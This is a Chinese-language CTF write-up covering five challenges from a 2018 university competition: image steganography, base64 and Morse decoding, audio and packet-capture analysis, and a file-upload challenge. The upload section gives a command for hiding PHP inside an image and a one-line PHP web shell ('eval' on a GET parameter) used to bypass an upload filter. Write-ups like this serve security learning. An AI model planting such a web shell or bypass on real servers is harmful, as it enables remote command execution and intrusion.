欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

2018第一届桂林电子科技大学绿盟杯CTF(部分)

程序员文章站 2022-05-15 14:14:20
...

一.黑洞

  2018第一届桂林电子科技大学绿盟杯CTF(部分)                 

题目给了这样一个黑洞图片,拿到图片首先右键看看属性

2018第一届桂林电子科技大学绿盟杯CTF(部分)

发现挺大的,可以藏一个压缩包

然后就是丢进kali虚拟机用,用binwalk查一下

2018第一届桂林电子科技大学绿盟杯CTF(部分)

发现竟然什么都没有!好吧,那下一步就是丢进010Editor里面看看。

2018第一届桂林电子科技大学绿盟杯CTF(部分)

看瞎了眼之后发现了一串字符串(在图片文件中一般都看到的是乱码,如果有一串的英文或数字什么的就要怀疑下了),那字符串就放进base64里面解密看看咯。

2018第一届桂林电子科技大学绿盟杯CTF(部分)

就这样出来了。

二.竟然有提示

同样是给了一场图片和一个txt网页,我们先看图片。

2018第一届桂林电子科技大学绿盟杯CTF(部分)

和上一题一样先右键看看属性,发现有18k,也可以藏一个压缩包了。

接着同上题一样,放在kali的虚拟机里binwalk一下,

2018第一届桂林电子科技大学绿盟杯CTF(部分)

发现这次真的有压缩包在里面,那接下俩就用kali自带的foremost命令,这个命令可以把隐藏着的包提取到output文件夹里面。

2018第一届桂林电子科技大学绿盟杯CTF(部分)

提取出来是个zip包(不会提取的话可以把图片的后缀改成rar再打开就行了,改成zip的话打开说文件已损坏,我也不知道为什么。)

这个提取出来的压缩包也有密码,他给的提示是“密码是R+3个数字”这样的话就可以用暴力**工具**了,我用的是RARmmpj(这个工具有的版本只能**rar,好像4.0就能**zip了),**出来密码是R666。

然后打开文件,是一个txt,里面有很长一段字符串(也是vm开头,看到vm开头的就丢进base64好了),放进base64里不停地解密(这里推荐一个base64解密网站,有的网站不停地解密会出错)最后解出来是.- -.. . .- ..-. . ..-. -...这样的一串,这一看就是摩斯电码啊,放到网上的在线摩斯电码网站解密,得到ADEAFEFB,再加上格式flag{ADEAFEFB}就是答案了。

三.音频分析

这次下载下来是一个音频文件,听一听,很明显的是摩斯电码的声音。

于是我想的是网上有没有听音频识别英文字母的软件,可惜没找到。2018第一届桂林电子科技大学绿盟杯CTF(部分)

那么只能把它丢进一个音频分析软件中(我用的是audacity)

2018第一届桂林电子科技大学绿盟杯CTF(部分)

根据短的是点,长的是杠,手动翻译出摩斯密文..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- . .-.  然后又丢进刚才那个网站,得FLAGISMORSE666GUETQWER,那么flag就是flag{morse666guetqwer}

四.数据包分析

这次下载的是一个pcapng的文件,是一堆数据包让你分析,用软件Wireshark打开它。

首先全部都是绿色的,就不用过滤无效包了。那么先搜索一下关键字flag看看,

2018第一届桂林电子科技大学绿盟杯CTF(部分)

找到了这俩,jpg那肯定是图片,现在找一个图片的包

2018第一届桂林电子科技大学绿盟杯CTF(部分)发现一堆ipod

我觉得应该是哪个flag的包告诉我应该导出哪张图可是不会看2018第一届桂林电子科技大学绿盟杯CTF(部分)以后会看了更新

全部图片导出了之后(导出方法见这个) 发现又是一张图片;

2018第一届桂林电子科技大学绿盟杯CTF(部分)

老规矩,看大小,放binwalk看

2018第一届桂林电子科技大学绿盟杯CTF(部分)

又有压缩包 照例子foremost提取,得到zip包,里面直接就是flag了。

五.UP

界面是一个上传界面,我先上传了一个jpg图片,提示上传成功上传到了 子目录/upload/1.jpg。

因为我接触过一些题是内涵图(就是把php代码隐藏在图片中上传,达到骗过服务器的目的),所以我用cmd命令行做了一张内涵图  ,将图1.jpg和代码2.php放在同一目录下,在该目录下按住shift右键打开cmd命令行 合成代码如下。

copy 1.jpg + 1.php  2.jpg

上传了之后题目弹窗“我已将你的犯罪记录提交给网警,束手就擒吧”;

然后我又试了下直接上传php文件,弹窗“不能上传该后缀文件”;

上传含有php代码的txt文件,依然是“我已将你的犯罪记录提交给网警,束手就擒吧”;

经过以前的经验,我知道这是为了阻碍我上传php,只要把php代码上传成功再访问上传文件就可以获得flag。

这时候不知道该怎么办....直到我发现了一个1.txt文件,上面有很多flag,但一看就不是答案,但这我知道了txt上传php代码是可以执行的。

胡乱尝试后发现只要带有“<?”就会被查出来,马上想到html中执行php,随后上传txt文件内容如下

<head>
<script language="php">
@eval($_GET['cmd']);
</script>  
</head>
成功绕过过滤,访问该文件获得flag。










相关标签: CTFWriteup